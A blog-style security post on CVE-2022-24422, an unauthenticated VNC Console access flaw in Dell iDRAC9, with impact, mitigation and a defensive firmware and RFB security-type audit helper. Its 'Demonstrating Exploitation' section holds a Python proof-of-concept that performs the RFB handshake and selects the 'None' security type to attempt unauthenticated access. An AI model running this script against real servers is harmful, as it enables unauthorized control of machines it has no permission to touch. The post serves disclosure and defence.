A critical security vulnerability (CVE-2022-24422) has been discovered in Dell iDRAC9, affecting versions 5.00.00.00 and later but prior to 5.10.10.00. This improper authentication vulnerability could allow a remote, unauthenticated attacker to gain access to the VNC Console. In this post we discuss the details of the vulnerability, provide a code snippet demonstrating potential exploitation, and link to the original references.

Vulnerability Details

Dell iDRAC9 (Integrated Dell Remote Access Controller 9) provides comprehensive remote management functionality for Dell PowerEdge servers. The vulnerability exists because incoming VNC connections are not properly authenticated. An attacker who successfully exploits it could gain unauthorized access to the VNC Console, a graphical remote access tool that gives control over the server's operating system.

Impact

Successful exploitation of this improper authentication vulnerability (CVE-2022-24422) by an unauthenticated remote attacker could lead to unauthorized access to the VNC Console, potentially granting control over the server's operating system. This could result in unauthorized actions, including data manipulation, privilege escalation, or launching further attacks that affect the server's integrity and availability.

Demonstrating Exploitation

The following Python script demonstrates a potential exploitation scenario against affected Dell iDRAC9 versions:

import socket

TARGET_IP = "192.168.1.100"   # placeholder address used in this post
TARGET_PORT = 5900            # standard RFB/VNC port
TIMEOUT_SECONDS = 5           # do not hang forever on an unresponsive host

# Establish a TCP connection to the VNC Console; the socket is closed automatically on exit
with socket.create_connection((TARGET_IP, TARGET_PORT), timeout=TIMEOUT_SECONDS) as sock:
    # Send the RFB 3.8 version handshake message (12 bytes)
    sock.sendall(b'RFB 003.008\n')

    # Receive the version handshake response
    response = sock.recv(1024)

    # Send a fake authentication request, bypassing the authentication process
    # (a single byte selecting RFB security type 1, "None")
    sock.sendall(b'\x01')

    # Receive the 4-byte SecurityResult (all zeros means the server accepted the session)
    auth_result = sock.recv(4)

    # Check for a successful authentication
    if auth_result == b'\x00\x00\x00\x00':
        print("Vulnerability exploited, access to VNC Console granted!")
    else:
        print("Exploitation failed; the target may be patched or not vulnerable.")

Please note that this code snippet is provided for educational purposes and should not be used for malicious activities.

Mitigation and Recommendations

Dell has acknowledged the vulnerability and released a security advisory (DSA-2022-057). Users are advised to update their iDRAC9 firmware to version 5.10.10.00 or later, which addresses the vulnerability. The official Dell security advisory can be found here:
- https://www.dell.com/support/kbdoc/en-us/000188097/dsa-2022-057-dell-emc-integrated-dell-remote-access-controller-idrac-sc-cve-2022-24422
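As an added example (not code from the original post or from Dell), the following Python audit helper classifies inventoried iDRAC9 firmware strings against the advisory's affected range and decodes the RFB 3.8 security-types message a VNC server sends after the version exchange, flagging a console that offers type 1 ("None"), i.e. access without credentials. The firmware strings and server messages it uses are constructed samples.

```python
"""Audit helpers for CVE-2022-24422: affected-version check and RFB security-type decoding."""
from typing import List, Tuple

# Affected range from the Dell advisory: 5.00.00.00 <= version < 5.10.10.00
AFFECTED_FROM = (5, 0, 0, 0)
FIXED_IN = (5, 10, 10, 0)

# RFB security-type identifiers (RFC 6143, section 7.1.2)
RFB_SECURITY_NONE = 1      # no authentication at all
RFB_SECURITY_VNC_AUTH = 2  # challenge/response VNC authentication


def parse_idrac_version(version: str) -> Tuple[int, ...]:
    """Turn a four-part iDRAC firmware string such as '5.10.10.00' into a comparable tuple."""
    parts = version.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected iDRAC version format: {version!r}")
    return tuple(int(p) for p in parts)


def is_affected(version: str) -> bool:
    """True when the firmware falls inside the advisory's vulnerable range."""
    return AFFECTED_FROM <= parse_idrac_version(version) < FIXED_IN


def server_security_types(msg: bytes) -> List[int]:
    """Decode the RFB 3.8 security-types message: U8 count, then `count` U8 type values.
    A count of 0 means the server refused the connection (a reason string follows)."""
    if not msg:
        raise ValueError("empty security-types message")
    count = msg[0]
    if count == 0:
        return []
    if len(msg) < 1 + count:
        raise ValueError("truncated security-types message")
    return list(msg[1:1 + count])


def offers_unauthenticated_access(msg: bytes) -> bool:
    """A console that lists security type 1 (None) admits clients without credentials."""
    return RFB_SECURITY_NONE in server_security_types(msg)


if __name__ == "__main__":
    # Constructed inventory and constructed server messages, not data from a real device
    for fw in ("4.40.10.00", "5.00.00.00", "5.10.00.00", "5.10.10.00"):
        print(fw, "AFFECTED" if is_affected(fw) else "not affected")
    print("None offered:", offers_unauthenticated_access(b"\x02\x01\x02"))  # True
    print("None offered:", offers_unauthenticated_access(b"\x01\x02"))      # False
```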

To further mitigate the risk of exploitation, users are encouraged to adhere to network security best practices, such as:

- Ensuring strong passwords are used for iDRAC9 user accounts

In conclusion, CVE-2022-24422 is a critical improper authentication vulnerability affecting multiple Dell iDRAC9 versions that could grant a remote, unauthenticated attacker access to the VNC Console. To protect your systems, apply the available firmware update and follow security best practices to reduce the risk of exploitation.

Timeline

Published on: 05/26/2022 16:15:00 UTC
Last modified on: 06/07/2022 17:07:00 UTC